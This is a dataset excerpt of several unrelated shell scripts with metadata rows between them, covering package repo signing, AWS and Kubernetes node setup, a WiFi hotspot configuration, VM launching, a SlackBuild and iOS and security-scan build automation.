msg2 "Signing ${pkgp}"
# GPG_TTY prevents "gpg: signing failed: Inappropriate ioctl for device"
if [[ "$(tty)" == "not a tty" ]]; then
tty=""
else
tty="GPG_TTY=$(tty) "
fi
run_cmd_no_output "${tty}gpg --batch --yes --detach-sign --use-agent -u ${gpg_sign_key} \"${script_dir}/${pkgp}\""
if [[ ${run_cmd_return} -ne 0 ]]; then
exit 1
fi
fi
done
}
remove_packages() {
# get a list of packages to backup
local pkgs=()
for (( i = 0; i < ${#modes[@]}; i++ )); do
package=${modes[i]}
local o=""
if [[ ${#pkgs[@]} -ne 0 ]]; then
local o="-o"
fi
pkgs+=("$o -regextype egrep -regex '.*/${package}-[a-z0-9\.\_]+-[0-9]+-x86_64.pkg.tar.(zst|xz)'")
done
# only run find, if ackages were found
if [[ ! ${#pkgs[@]} -eq 0 ]]; then
run_cmd_show_and_capture_output_no_dry_run "find ${repo_target} -type f ${pkgs[@]}"
for x in ${run_cmd_output}; do
debug "Evaluating ${x}"
pkgname=$(package_name_from_path ${x})
pkgvers=$(package_version_from_path ${x})
debug "pkgname: ${pkgname}"
debug "pkgvers: ${pkgvers}"
# asterisk globs the package signature
epkg="${repo_target}/x86_64/${pkgname}-${pkgvers}*"
debug "backing up package: ${epkg}"
package_exist_list+=("${epkg}")
done
fi
if [[ ${#package_exist_list[@]} -eq 0 ]]; then
msg2 "No packages found for backup."
return
fi
debug_print_array "package_exist_list" "${package_exist_list[@]}"
msg "Backing up packages..."
run_cmd "mv ${package_exist_list[@]} ${package_backup_dir}/"
# remove packages from repo
local arch="x86_64"
local pkg_remove_list=()
for (( i = 0; i < ${#modes[@]}; i++ )); do
package=${modes[i]}
pkg_remove_list+=("${package}")
done
msg "Removing packages from repo"
run_cmd "repo-remove -k ${gpg_sign_key} -s -v ${repo_target}/${arch}/${repo_name}.db.tar.xz ${pkg_remove_list[@]}"
}
msg "$(date) :: ${script_name} started..."
# The abs path to the repo
if [[ ${repo_name} == "clean-chroot-manager" ]]; then
repo_name="chroot_local"
repo_target="$(dirname ${chroot_path})/root/repo"
if [[ ! -d ${repo_target} ]]; then
# XXX: NEED TO TEST THIS
run_cmd_no_output_no_dry_run "sudo mkdir -p ${repo_target} && sudo chown ${makepkg_nonpriv_user}: -R ${repo_target}"
fi
else
repo_target=${repo_basepath}/${repo_name}
fi
debug "repo_name: ${repo_name}"
debug "repo_target: ${repo_target}"
if [[ ${remove_packages} -eq 1 ]]; then
remove_packages
else
if [[ ${pull_remote_repo} -eq 1 ]] && [[ ${no_pull_remote} -ne 1 ]]; then
pull_repo
fi
if [[ ${pull_remote_testing_repo} -eq 1 ]] && [[ ${no_pull_remote} -ne 1 ]]; then
pull_testing_repo
fi
if [[ ${sign_packages} -eq 1 ]]; then
for (( i = 0; i < ${#modes[@]}; i++ )); do
mode=${modes[i]}
kernel_name=${kernel_names[i]}
get_kernel_update_funcs
debug_print_default_vars
export script_dir mode kernel_name
source_safe "src/kernels/${kernel_name}.sh"
export zfs_pkgver=""
for func in ${update_funcs[@]}; do
debug "Evaluating '${func}'"
"${func}"
repo_package_list
sign_packages
done
done
exit 0
fi
for (( i = 0; i < ${#modes[@]}; i++ )); do
mode=${modes[i]}
kernel_name=${kernel_names[i]}
get_kernel_update_funcs
debug_print_default_vars
export script_dir mode kernel_name
source_safe "src/kernels/${kernel_name}.sh"
export zfs_pkgver=""
for func in ${update_funcs[@]}; do
debug "Evaluating '${func}'"
"${func}"
repo_package_list
if [[ ${repo_name} != "chroot_local" ]]; then
repo_package_backup
fi
sign_packages
repo_add
done
done
if [[ ${#all_added_pkgs[@]} -gt 0 ]]; then
msg2 "${#all_added_pkgs[@]} packages were added to the repo:"
printf '%s\n' "${all_added_pkgs[@]}"
else
msg2 "No packages were added to the repo"
fi
fi
if [[ ${haz_error} -ne 0 ]]; then
warning "An error has been detected! Inspect output above closely..."
fi
| true
|
8cbf30d359e8e1bb517dc742347a72f52760b427
|
Shell
|
avkovalevs/aws-pg
|
/roles/pgpool/files/aws-apitools-common.sh
|
UTF-8
| 832
| 3.375
| 3
|
[
"BSD-3-Clause"
] |
permissive
|
# Set path for AWS API tools packages
export AWS_PATH=/opt/aws
export PATH=$PATH:$AWS_PATH/bin
if [ -z "${JAVA_HOME}" ]; then
if [ -d /usr/java/latest ]; then
# prefer third-party JDK if present
export JAVA_HOME=/usr/java/latest
elif [ -d /usr/lib/jvm/java ]; then
export JAVA_HOME=/usr/lib/jvm/java
elif [ -d /usr/lib/jvm/jre ]; then
export JAVA_HOME=/usr/lib/jvm/jre
fi
fi
# Source environment variables for each set of tools
for aws_product in $(find /opt/aws/apitools /opt/aws/amitools -maxdepth 1 -type l 2>/dev/null); do
[ -e $aws_product/environment.sh ] && source $aws_product/environment.sh
done
unset aws_product
# Uncomment this line to specify AWS_CREDENTIAL_FILE
# (see /opt/aws/credential-file-path.template)
#export AWS_CREDENTIAL_FILE=/opt/aws/credentials.txt
| true
|
f9a701830a406928202eeef5800b3ef1eaa97401
|
Shell
|
boxnos/hashedpotatoes
|
/test/test.sh
|
UTF-8
| 414
| 2.796875
| 3
|
[] |
no_license
|
#!/bin/sh
file=test/hashes.zsh
cmdf="./hashed -f $file"
test_hash () {
assertEquals '~src/vim' $($cmdf $HOME/src/vim)
}
test_unhash() {
assertEquals $HOME/src/vim $($cmdf -u '~src/vim')
}
test_muluti() {
assertEquals "$HOME/src/vim
$HOME/bin" "$($cmdf -un '~src/vim' '~bin')"
}
test_pipe() {
assertEquals "$HOME/src/vim
$HOME/bin" "$(echo '~src/vim
~bin' | $cmdf -un)"
}
. /usr/share/shunit2/shunit2
| true
|
4b494c831ea01d88345181e638447b17e0135809
|
Shell
|
rootAir/big-data-projects
|
/sqoop-examples/Sqoop_import/basic_imports/sqoop_import_split_by_string.sh
|
UTF-8
| 710
| 2.609375
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# This query fails
:'
sqoop import \
--connect jdbc:mysql://db.hostname.com:3306/db \
--username user \
-P \
--table table_name \
--warehouse-dir /user/karthik/sqoop_import/db \
--split-by string_column_name
'
# The below query works
# The reason is by default splitting across a String column is disabled
# The -D control argument is needed to make the text splitter to true
# This then makes the split-by work on the text column.
sqoop import \
-Dorg.apache.sqoop.splitter.allow_text_splitter=true \
--connect jdbc:mysql://db.hostname.com:3306/db \
--username user \
-P \
--table table_name \
--warehouse-dir /user/karthik/sqoop_import/db \
--split-by string_column_name
| true
|
8518ca2df963ee7c6c54aa3175ec3d7a6b08d4f0
|
Shell
|
msoe-sisyphus-sd/msoe-sisbot
|
/start_hotspot.sh
|
UTF-8
| 2,204
| 3.375
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# comment/uncomment line in file
comment() {
lua - "$1" "$2" "$3" <<EOF > "$3.tmp"
local key=assert(arg[1])
local search=key:match("")
local value=assert(arg[2])
local fn=assert(arg[3])
local file=assert(io.open(fn))
local made_change=false
for line in file:lines() do
if value=="true" then
if line:match("^%s*"..key..".*") then
line="#"..line:gsub("%%","")
end
else
if line:match("^#%s*"..key..".*") then
line=line:sub(2):gsub("%%","")
end
end
print(line)
end
EOF
sudo mv "$3.tmp" "$3"
}
# replace line in file (also uncomments)
replace() {
lua - "$1" "$2" "$3" <<EOF > "$3.tmp"
local key=assert(arg[1])
local search=key:match("")
local value=assert(arg[2])
local fn=assert(arg[3])
local file=assert(io.open(fn))
for line in file:lines() do
if line:match("^#?%s*"..key..".*") then
line=value:gsub("%%","")
end
print(line)
end
EOF
sudo mv "$3.tmp" "$3"
}
sudo ifdown wlan0
# make sure services are down (in case of restart)
sudo service hostapd stop
sudo service isc-dhcp-server stop
sudo cp /etc/network/interfaces.hotspot /etc/network/interfaces
sudo cp /etc/wpa_supplicant/wpa_supplicant.conf.bak /etc/wpa_supplicant/wpa_supplicant.conf # clear wpa_supplicant
# set password if given
size=${#1}
if [ -n "$1" ] && [ "$size" -gt 7 ]; then
comment 'wpa=2' false /etc/hostapd/hostapd.conf
replace "wpa_passphrase=" "wpa_passphrase=$1" /etc/hostapd/hostapd.conf
# needs to be WPA-PSK
replace 'wpa_key_mgmt=WPA' 'wpa_key_mgmt=WPA-PSK' /etc/hostapd/hostapd.conf
comment 'wpa_pairwise=CCMP' false /etc/hostapd/hostapd.conf
comment 'wpa_group_rekey=86400' false /etc/hostapd/hostapd.conf
else
comment 'wpa=2' true /etc/hostapd/hostapd.conf
# reset to sisyphus, and comment out
replace 'wpa_passphrase=' '#wpa_passphrase=sisyphus' /etc/hostapd/hostapd.conf
comment 'wpa_key_mgmt=WPA' true /etc/hostapd/hostapd.conf
comment 'wpa_pairwise=CCMP' true /etc/hostapd/hostapd.conf
comment 'wpa_group_rekey=86400' true /etc/hostapd/hostapd.conf
fi
sudo ifup wlan0
#sudo ifconfig wlan0 192.168.42.1
sudo systemctl daemon-reload
sudo service hostapd start
sudo service isc-dhcp-server start
echo "Hotspot enabled"
| true
|
4b8036c62dddb487420495191eb1c2c3a7657e60
|
Shell
|
foxxifu/my-ids
|
/tools/bin/stop_biz.sh
|
UTF-8
| 312
| 2.796875
| 3
|
[] |
no_license
|
#! /bin/bash
PROC_BIZ='ids-biz'
stop_biz()
{
if [ $(ps -ef --columns 2000 | grep "Proc=${PROC_BIZ}" | grep -v grep | wc -l) -ne 0 ]
then
bizid=`ps -ef --columns 2000 | grep "Proc=${PROC_BIZ}" | grep -v grep | awk '{print $2}'`
sudo /bin/kill -9 $bizid
sleep 1
fi
}
stop_biz
| true
|
46baa587eb47987a2a86b5d49be7c51205008365
|
Shell
|
DannyGH/AzureIoT
|
/extras/sync-sdk.sh
|
UTF-8
| 1,129
| 3.765625
| 4
|
[
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] |
permissive
|
#!/bin/sh
# Copyright (c) Arduino. All rights reserved.
# Licensed under the MIT license. See LICENSE file in the project root for full license information.
SDK_DIR=$1
SRC_SDK_DIR=../src/sdk
EXAMPLES_SDK_DIR=../examples/sdk
SDK_METADATA=$SRC_SDK_DIR/metadata.txt
if [ -z "$SDK_DIR" ]
then
echo "Please specify Azure SDK directory as command line argument!"
exit 1
fi
if [ ! -d "$SDK_DIR" ]
then
echo "'$SDK_DIR' does not exist!"
exit 1
fi
copy_filelist() {
for file in `cat $1`
do
echo "\t$file"
cp "$2/$file" "$3"
done
}
echo "Copying SDK C source files over"
copy_filelist "sdk-files.txt" "$SDK_DIR" "$SRC_SDK_DIR"
echo "Copying SDK sample files over"
copy_filelist "iothub-client-sample-http-files.txt" "$SDK_DIR" "$EXAMPLES_SDK_DIR/iothub_client_sample_http"
copy_filelist "simplesample-http-files.txt" "$SDK_DIR" "$EXAMPLES_SDK_DIR/simplesample_http"
echo "Storing SDK metadata"
git --git-dir "$SDK_DIR/.git" ls-remote --get-url > "$SDK_METADATA"
git --git-dir "$SDK_DIR/.git" rev-parse --abbrev-ref HEAD >> "$SDK_METADATA"
git --git-dir "$SDK_DIR/.git" rev-parse HEAD >> "$SDK_METADATA"
cat $SDK_METADATA
| true
|
8cb1a53292918082cdb577fa1e69ae0f63e805f8
|
Shell
|
mipsum/underworld
|
/vm/run.sh
|
UTF-8
| 497
| 2.53125
| 3
|
[] |
no_license
|
[ -f "./hdd.img" ] || {
echo 'creating vm first'
sh ./create.sh
}
D="-U deaddead-dead-dead-dead-deaddeaddead"
USERBOOT="$HOME/Library/Caches/Homebrew/xhyve--git/test/userboot.so"
BOOTVOLUME="hdd.img"
KERNELENV=""
MEM="-m 2G"
SMP="-c 2"
PCI_DEV="-s 0:0,hostbridge -s 31,lpc"
NET="-s 2:0,virtio-net"
IMG_HDD="-s 4:0,virtio-blk,$BOOTVOLUME"
LPC_DEV="-l com1,stdio"
ACPI="-A"
sudo xhyve $ACPI $MEM $SMP $PCI_DEV $LPC_DEV $NET $IMG_HDD $UUID -f fbsd,$USERBOOT,$BOOTVOLUME,"$KERNELENV"
exit 0
| true
|
d7850650f68f59fdb1513deae506328aff7825b3
|
Shell
|
gandazgul/k8s-infrastructure
|
/install-k8s/configNode.sh
|
UTF-8
| 4,817
| 3.25
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
if [[ $EUID = 0 ]]; then
printf "Don't run this script as root"
exit 1
fi
if ! dnf list installed cri-o > /dev/null 2>&1; then
printf "\nInstall cri-o and crun ================================================================================\n"
sudo dnf -y module enable cri-o:1.24 || exit 1
sudo dnf -y install crun cri-o || exit 1
sudo dnf update --exclude="cri-*" || exit 1
printf "\nRaising user watches to the highest number to allow kubelet to work with lots of containers ===========\n"
echo fs.inotify.max_user_watches=1048576 | sudo tee --append /etc/sysctl.conf
echo fs.inotify.max_user_instances=1048576 | sudo tee --append /etc/sysctl.conf
fi;
cat /etc/crio/crio.conf | grep default_runtime | grep crun
GREP_RE=$?
if [ $GREP_RE != 0 ]; then
printf "\nChange cri-o's config to work with crun ===============================================================\n"
sudo sed -c -i "s/\(default_runtime *= *\).*/\1\"crun\"/" /etc/crio/crio.conf || exit 1
echo "[crio.runtime.runtimes.crun]" | sudo tee --append /etc/crio/crio.conf || exit 1
echo "runtime_path = \"/usr/bin/crun\"" | sudo tee --append /etc/crio/crio.conf || exit 1
echo "runtime_type = \"oci\"" | sudo tee --append /etc/crio/crio.conf || exit 1
echo "runtime_root = \"/run/crun\"" | sudo tee --append /etc/crio/crio.conf || exit 1
printf "\nEnable cri-o ==========================================================================================\n"
sudo systemctl daemon-reload || exit 1
sudo systemctl enable --now crio || exit 1
sudo systemctl start crio || exit 1
printf "\nVerify cri-o is running ===============================================================================\n"
if ! systemctl is-active --quiet crio >/dev/null 2>&1; then
printf "\nSomething failed while installing cri-o please verify that is running and run this script again"
exit 1
fi;
fi;
printf "\nInstalling Kubernetes packages from repo ==================================================================\n"
if [[ ! -f /etc/yum.repos.d/kubernetes.repo ]]; then
printf "\nInstall kubelet, kubeadm, crictl(needed by kubelet), cockpit (nice fedora dashboard):"
sudo bash -c 'cat <<EOF > /etc/yum.repos.d/kubernetes.repo
[kubernetes]
name=Kubernetes
baseurl=https://packages.cloud.google.com/yum/repos/kubernetes-el7-x86_64
enabled=1
gpgcheck=1
repo_gpgcheck=1
gpgkey=https://packages.cloud.google.com/yum/doc/yum-key.gpg https://packages.cloud.google.com/yum/doc/rpm-package-key.gpg
exclude=kube*
[kubernetes-unstable]
name=Kubernetes-unstable
baseurl=https://packages.cloud.google.com/yum/repos/kubernetes-el7-x86_64-unstable
enabled=0
gpgcheck=1
repo_gpgcheck=1
gpgkey=https://packages.cloud.google.com/yum/doc/yum-key.gpg https://packages.cloud.google.com/yum/doc/rpm-package-key.gpg
exclude=kube*
EOF'
sudo dnf -y install --enablerepo=kubernetes kubelet-1.24.11-0 kubectl-1.24.11-0 kubeadm-1.24.11-0 --disableexcludes=kubernetes || exit 1
sudo dnf -y install cockpit-pcp || exit 1
# enable cni plugins
sudo mkdir -p /opt/cni/
sudo ln -s /usr/libexec/cni/ /opt/cni/bin
fi;
printf "\nEnabling cockpit ==========================================================================================\n"
sudo systemctl enable --now cockpit.socket || exit 1
if dnf list installed zram-generator-defaults > /dev/null 2>&1; then
printf "\nDisabling swap ==========================================================================================\n"
sudo dnf -y remove zram-generator-defaults
sudo systemctl stop swap-create@zram0 || exit 1
sudo swapoff /dev/zram0 || exit 1
fi
if systemctl is-active --quiet firewalld >/dev/null 2>&1; then
printf "\nDisabling the firewall ================================================================================\n"
sudo systemctl stop firewalld
sudo systemctl disable firewalld
# fedora 29 complained that uninstalling firewalld would uninstall kernel-core
# sudo dnf -y remove firewalld
# Masking prevents the service from ever being started
sudo systemctl mask firewalld.service
# needed for cri-o
sudo modprobe overlay
# enable iptables in the kernel
sudo modprobe br_netfilter
cat <<EOF | sudo tee /etc/modules-load.d/crio.conf
overlay
br_netfilter
EOF
# Enable ipv4 forwarding
echo 1 | sudo tee --append /proc/sys/net/ipv4/ip_forward
# This ensures all network traffic goes through iptables
echo 1 | sudo tee --append /proc/sys/net/bridge/bridge-nf-call-iptables
# same as above?
cat <<EOF | sudo tee /etc/sysctl.d/99-kubernetes-cri.conf
net.bridge.bridge-nf-call-iptables = 1
net.ipv4.ip_forward = 1
net.bridge.bridge-nf-call-ip6tables = 1
EOF
# make the above settings take effect now
sudo sysctl --system
fi;
| true
|
c199a027e81b9305732c15bc69739d5fb8ca7bb6
|
Shell
|
nabto/unabto-jorjin-sdk
|
/Make.sh
|
UTF-8
| 553
| 3.171875
| 3
|
[] |
no_license
|
#!/bin/bash
# This script clears the terminal, displays a greeting and copies the
# relevant files from the uNabto submodule. It then deletes the remaining files.
clear # clear terminal window
echo "The script starts now."
cp unabto/src/unabto/. src/unabto/ -R
mkdir -p src/modules/crypto/generic/
mkdir -p src/platforms/
cp unabto/src/modules/crypto/generic/. src/modules/crypto/generic/ -R
cp unabto/src/platforms/unabto_common_types.h src/platforms/unabto_common_types.h -R
rm -rf unabto
echo "I'm giving you back your prompt now."
echo
| true
|
d12d329160d7a7d2e179bc22373cc7437b053eed
|
Shell
|
Ponce/slackbuilds
|
/office/adobe-reader/adobe-reader.SlackBuild
|
UTF-8
| 5,110
| 3.15625
| 3
|
[] |
no_license
|
#!/bin/bash
# Slackware build script for acroread - binary repackaging
# Copyright 2006-2009 Robby Workman Northport, Alabama, USA
# Copyright 2008-2010 Heinz Wiesinger, Amsterdam, The Netherlands
# All rights reserved.
#
# Redistribution and use of this script, with or without modification, is
# permitted provided that the following conditions are met:
#
# 1. Redistributions of this script must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR ''AS IS'' AND ANY EXPRESS OR IMPLIED
# WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO
# EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# Thanks to Andrew Brouwers for the original SlackBuild script and for
# permission to modify it as needed.
# 20220401 bkw: Modified by SlackBuilds.org, BUILD=2:
# - make desktop file validate.
# - use relative symlinks, not absolute.
cd $(dirname $0) ; CWD=$(pwd)
PRGNAM=adobe-reader
VERSION=${VERSION:-9.5.5}
# SRCARCH/ARCH should stop lint scripts warnings - DW 2023-05-15 18:33:15 +0100
SRCARCH=i486 # Leave this alone for acroread
ARCH=i586
BUILD=${BUILD:-2}
TAG=${TAG:-_SBo}
PKGTYPE=${PKGTYPE:-tgz}
# Use ADOBE_LANG for installing a different language version of acroread
# Moved here so that PRINT_PACKAGE_NAME outputs the correct name
# DW 2023-05-15 18:32:26 +0100
ADOBE_LANG=${ADOBE_LANG:-enu}
if [ ! -z "${PRINT_PACKAGE_NAME}" ]; then
echo "$PRGNAM-${VERSION}_$ADOBE_LANG-$ARCH-$BUILD$TAG.$PKGTYPE"
exit 0
fi
TMP=${TMP:-/tmp/SBo}
PKG=$TMP/package-$PRGNAM
OUTPUT=${OUTPUT:-/tmp}
set -e
rm -rf $PKG
mkdir -p $TMP $PKG $OUTPUT
cd $TMP
rm -rf AdobeReader
tar xvf $CWD/AdbeRdr${VERSION}-1_${SRCARCH}linux_${ADOBE_LANG}.tar.bz2
VERSION=${VERSION}_$ADOBE_LANG
# Create directory structure and extract files from archives
mkdir -p $PKG/opt $PKG/usr/bin
cd $PKG/opt
tar xf $TMP/AdobeReader/COMMON.TAR
tar xf $TMP/AdobeReader/ILINXR.TAR
cd $PKG/opt/Adobe
# 20220401 bkw: desktop-file-validate
sed -i -e '/^Caption/d' \
-e '/^Categories/s,Application;,,' \
-e 's, *$,,' \
Reader9/Resource/Support/AdobeReader.desktop
# Remove stuff we don't need
rm -rf Reader9/Reader/HowTo
rm -r Reader9/Browser/{HowTo,install_browser_plugin}
# Add symlink for binary to /usr/bin
( cd $PKG/usr/bin ; ln -sf ../../opt/Adobe/Reader9/bin/acroread . )
# Add symlink for browser plugins
mkdir -p $PKG/usr/lib/mozilla/plugins
cd $PKG/usr/lib/mozilla/plugins
ln -sf ../../../../opt/Adobe/Reader9/Browser/intellinux/nppdf.so .
cd -
# Add symlink to AdobeReader.xml for correct mimetype
mkdir -p $PKG/usr/share/mime/packages
cd $PKG/usr/share/mime/packages
ln -sf ../../../../opt/Adobe/Reader9/Resource/Support/AdobeReader.xml .
cd -
# Fix symlink to .desktop file
mkdir -p $PKG/usr/share/{applications,pixmaps}
cd $PKG/usr/share/applications
ln -sf ../../../opt/Adobe/Reader9/Resource/Support/AdobeReader.desktop .
cd -
# Link icon to /usr/share/pixmaps
cd $PKG/usr/share/pixmaps
ln -sf ../../../opt/Adobe/Reader9/Resource/Icons/48x48/AdobeReader9.png .
cd -
# Link manpage to /usr/man/man1
mkdir -p $PKG/usr/man/man1
cd $PKG/usr/man/man1
ln -sf ../../../opt/Adobe/Reader9/Resource/Shell/acroread.1.gz .
cd -
# Fix bug in bash completion script by redefining "_filedir" function
# to "_acroread_filedir" as suggested on the adobe forum:
# http://forums.adobe.com/thread/745833
sed -i 's/_filedir/_acroread_filedir/g' $PKG/opt/Adobe/Reader9/Resource/Shell/acroread_tab
# Link completion script to /usr/share/bash-completion/completions
mkdir -p $PKG/usr/share/bash-completion/completions
ln -sf ../../../../opt/Adobe/Reader9/Resource/Shell/acroread_tab \
$PKG/usr/share/bash-completion/completions/acroread
# Move docs to their correct locations
mkdir -p $PKG/usr/doc/$PRGNAM-$VERSION
cp -a $TMP/AdobeReader/ReadMe.htm $PKG/usr/doc/$PRGNAM-$VERSION
cat $CWD/$PRGNAM.SlackBuild > $PKG/usr/doc/$PRGNAM-$VERSION/$PRGNAM.SlackBuild
mkdir -p $PKG/install
cat $CWD/slack-desc > $PKG/install/slack-desc
cat $CWD/doinst.sh > $PKG/install/doinst.sh
# Fix ownership and permissions
cd $PKG
find . -type d -exec chmod 755 {} \;
chown -R root:root .
find -L . \
\( -perm 777 -o -perm 775 -o -perm 750 -o -perm 711 -o -perm 555 \
-o -perm 511 \) -exec chmod 755 {} \+ -o \
\( -perm 666 -o -perm 664 -o -perm 640 -o -perm 600 -o -perm 444 \
-o -perm 440 -o -perm 400 \) -exec chmod 644 {} \+
# No stripping of binaries and such, as Firefox doesn't like naked acroread :D
# Just build the package... ;P
/sbin/makepkg -p -l y -c n $OUTPUT/$PRGNAM-$VERSION-$ARCH-$BUILD$TAG.$PKGTYPE
| true
|
e29e91acbc71db094de3b96ee0795658aeeb7916
|
Shell
|
yunifyorg/anteaterfw
|
/run_scan.sh
|
UTF-8
| 4,134
| 3.890625
| 4
|
[] |
no_license
|
#!/bin/bash
# Cross platform build environment to run Anteater
#
# Copyright 2016-2017, Ashlee Young. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##### Settings #####
VERSION=0.3
AUTHOR="Ashlee Young"
MODIFIED="January 31, 2017"
JAVA_VERSION=1.7 #PMD will not currently build with Java version other than 1.7
ANT_VERSION=1.9.8 #Ant version 1.10.0 and above does not appear to work with Java 1.7
MAVEN_VERSION=3.3.9
MAVENURL="https://repo.maven.apache.org/maven2/org/apache/maven/apache-maven/$MAVEN_VERSION/apache-maven-$MAVEN_VERSION-src.tar.gz"
PMD_VERSION=5.5.2
EXPAT_VERSION=2.0.1
RATS_VERSION=2.4
export PROJECTROOT=$(pwd)
export BUILDROOT="$PROJECTROOT"/build
export BINROOT="$PROJECTROOT"/bin
export SRCROOT="$PROJECTROOT"/src
export PATCHROOT="$PROJECTROOT"/patches
export CONFIGSROOT="$PROJECTROOT"/configs
export ANTROOT="$BUILDROOT"/ant
export ANT_HOME="$ANTROOT"/apache-ant-$ANT_VERSION
export MAVENROOT="$BUILDROOT"/maven
export M2_HOME=$BUILDROOT/maven/build
export M2=$M2_HOME/bin
export PMDSRC="$SRCROOT"/pmd
export PMDBUILD="$BUILDROOT"/pmd
export ANTEATERSRC="$SRCROOT"/anteater
export ANTEATERBUILD="$BUILDROOT"/anteater
export RATSSRC="$SRCROOT"/rats-"$RATS_VERSION".tgz
export EXPATSRC="$SRCROOT"/expat-"$EXPAT_VERSION".tar.gz
export RATSBUILD="$BUILDROOT"/rats-"$RATS_VERSION"
export EXPATBUILD="$BUILDROOT"/expat-"$EXPAT_VERSION"
export REPOSDIR="$ANTEATERBUILD"/repos
##### End Settings #####
##### Version #####
# Simply function to display versioning information
display_version() {
clear
printf "You are running run_scan.sh script Version: %s \n" "$VERSION"
printf "Last modified on %s, by %s. \n\n" "$MODIFIED" "$AUTHOR"
sleep 1
printf "Checking build environment dependencies... \n\n"
}
##### End Version #####
##### Ask Function #####
# This is a common function I use for prompting a yes/no response
ask() {
while true; do
if [ "${2:-}" = "Y" ]; then
prompt="Y/n"
default=Y
elif [ "${2:-}" = "N" ]; then
prompt="y/N"
default=N
else
prompt="y/n"
default=
fi
# Ask the question
if [ "$MODE" = "auto" ]; then
REPLY="Y"
else
read -p "$1 [$prompt] " REPLY
fi
# Default?
if [ -z "$REPLY" ]; then
REPLY=$default
fi
# Check if the reply is valid
case "$REPLY" in
Y*|y*) return 0 ;;
N*|n*) return 1 ;;
esac
done
}
##### End Ask Function #####
##### Check for WORKSPACE #####
# The WORKSPACE variable can be set to establish the Jenkins path to where the repos are cloned.
# if not set, the path should be relative to the PROJECTROOT.
check_variable() {
if [ -n "$WORKSPACE" ]; then
check_if_set="$(cat "$ANTEATERBUILD"/anteater.conf | grep "$WORKSPACE" | wc -l)"
if [ ! "$check_if_set" -gt 0 ]; then
printf "Your WORKSPACE variable is set, but not reflected in your anteater.conf file \n"
if ask "Would you like us to change it?"; then
cp "$CONFIGSROOT"/anteater.conf "$ANTEATERBUILD"
sed -i "s|REPLACE|$WORKSPACE|g" "$ANTEATERBUILD"/anteater.conf
fi
fi
fi
}
##### End Check for WORKSPACE #####
##### Get repo #####
scan_repo() {
url="$1"
cd "$ANTEATERBUILD"
if [ ! -d "$REPOSDIR" ]; then
mkdir "$REPOSDIR"
fi
cd "$ANTEATERBUILD"
source env/bin/activate
anteater scan all
}
##### End Get repo #####
main() {
display_version
check_variable
scan_repo
}
main
| true
|
b6f542d5629379b443650e1265b419bbecb90ab3
|
Shell
|
jlyonsmith/build-buddy
|
/sample-scripts/ios/master-build.sh
|
UTF-8
| 2,234
| 3.96875
| 4
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
#
# Build script for an iOS project master branch
# Passed in from Build Buddy
if [[ -z "$GIT_REPO_OWNER" || -z "$GIT_REPO_NAME" ]]; then
echo Must set GIT_REPO_OWNER, GIT_REPO_NAME
exit 1
fi
BRANCH=$1
# Configure these for your build
XCODE_WORKSPACE=${GIT_REPO_NAME}.xcworkspace
XCODE_TEST_SCHEME=${GIT_REPO_NAME}
XCODE_ARCHIVE_SCHEME=${GIT_REPO_NAME}
BUILD_DIR=~/Builds
SIMULATOR_CONFIG="platform=iOS Simulator,name=iPhone 6,OS=latest"
XCODEBUILD=$(which xcodebuild)
# Initialize
echo Creating $BUILD_DIR
mkdir -p ${BUILD_DIR}/${GIT_REPO_OWNER}
cd ${BUILD_DIR}/${GIT_REPO_OWNER}
GIT_CLONE_DIR=$BUILD_DIR/$GIT_REPO_OWNER/$GIT_REPO_NAME
if [[ -d $GIT_CLONE_DIR ]]; then
echo Deleting $GIT_CLONE_DIR
rm -rf $GIT_CLONE_DIR
fi
# Pull source
echo Pulling sources to ${BUILD_DIR}/${GIT_REPO_OWNER}/${GIT_REPO_NAME}
git clone git@github.com:${GIT_REPO_OWNER}/${GIT_REPO_NAME}.git ${GIT_REPO_NAME}
# Switch to correct branch
cd ${GIT_REPO_NAME}
git checkout master
# Install Gemfile
echo Pulling Gemfile
bundler install
# Pull Dependencies
echo Pulling Cocopods
bundler exec pod install
# Update the version number
mkdir Scratch
bundle exec vamper -u
TAG_NAME=$(cat Scratch/${GIT_REPO_NAME}.tagname.txt)
TAG_DESCRIPTION=$(cat Scratch/${GIT_REPO_NAME}.tagdesc.txt)
echo New version is $TAG_DESCRIPTION
# Test
if ! $XCODEBUILD -workspace $XCODE_WORKSPACE -scheme "$XCODE_TEST_SCHEME" -sdk iphonesimulator -destination "$SIMULATOR_CONFIG" test; then
echo ERROR: Tests failed
exit 1
fi
# Build Archive
if ! $XCODEBUILD -workspace $XCODE_WORKSPACE -scheme "$XCODE_ARCHIVE_SCHEME" archive; then
echo ERROR: Archive build failed
exit 1
fi
# List of fixes since last tag
LAST_TAG_NAME=$(git tag -l "${BRANCH}*" | tail -1)
if [[ -n "$LAST_TAG_NAME" ]]; then
BUG_FIXES=$(git log --pretty=oneline ${LAST_TAG_NAME}..HEAD | egrep -io 'CM-[0-9]+' | tr '[:lower:]' '[:upper:]' | sort -u | tr "\\n" " ")
echo Bugs fixed since ${LAST_TAG_NAME} - ${BUG_FIXES}
else
echo First build on this branch
fi
